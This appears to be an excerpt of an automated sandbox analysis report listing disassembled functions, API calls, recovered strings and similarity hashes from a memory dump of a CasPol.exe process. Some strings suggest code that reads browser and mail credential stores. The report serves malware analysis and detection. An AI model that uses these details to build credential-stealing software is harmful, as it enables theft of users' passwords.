                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                                                    • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                    • Opcode ID: 3be125bbec447ab7c511ca77c5680941c96119bb7b45ebdfa7cd77d846b95589
                                                                                                                                                                                                                    • Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3be125bbec447ab7c511ca77c5680941c96119bb7b45ebdfa7cd77d846b95589
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                                                    • String ID: C@$mail.identity
                                                                                                                                                                                                                    • API String ID: 1439213657-721921413
                                                                                                                                                                                                                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                                                    • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1479990042-0
                                                                                                                                                                                                                    • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                                                    • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                                    • String ID: Ul@
                                                                                                                                                                                                                    • API String ID: 270934217-715280498
                                                                                                                                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 203655857-0
                                                                                                                                                                                                                    • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                                                    • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                                                      • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                      • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                                                    • API String ID: 3699762281-259020660
                                                                                                                                                                                                                    • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                                                    • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                                                                                                                                                                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                                                    • String ID: recovered %d pages from %s
                                                                                                                                                                                                                    • API String ID: 985450955-1623757624
                                                                                                                                                                                                                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                                                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ultoasprintf
                                                                                                                                                                                                                    • String ID: %s %s %s
                                                                                                                                                                                                                    • API String ID: 432394123-3850900253
                                                                                                                                                                                                                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409919
                                                                                                                                                                                                                    • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                                                    • String ID: N\@
                                                                                                                                                                                                                    • API String ID: 568519121-3851889168
                                                                                                                                                                                                                    • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                                                    • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                    • String ID: menu_%d
                                                                                                                                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _msizerealloc
                                                                                                                                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                                                    • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                    • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                                                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                    • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                                                                                    • String ID: A4@$Server Details
                                                                                                                                                                                                                    • API String ID: 1096422788-4071850762
                                                                                                                                                                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3110682361-0
                                                                                                                                                                                                                    • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
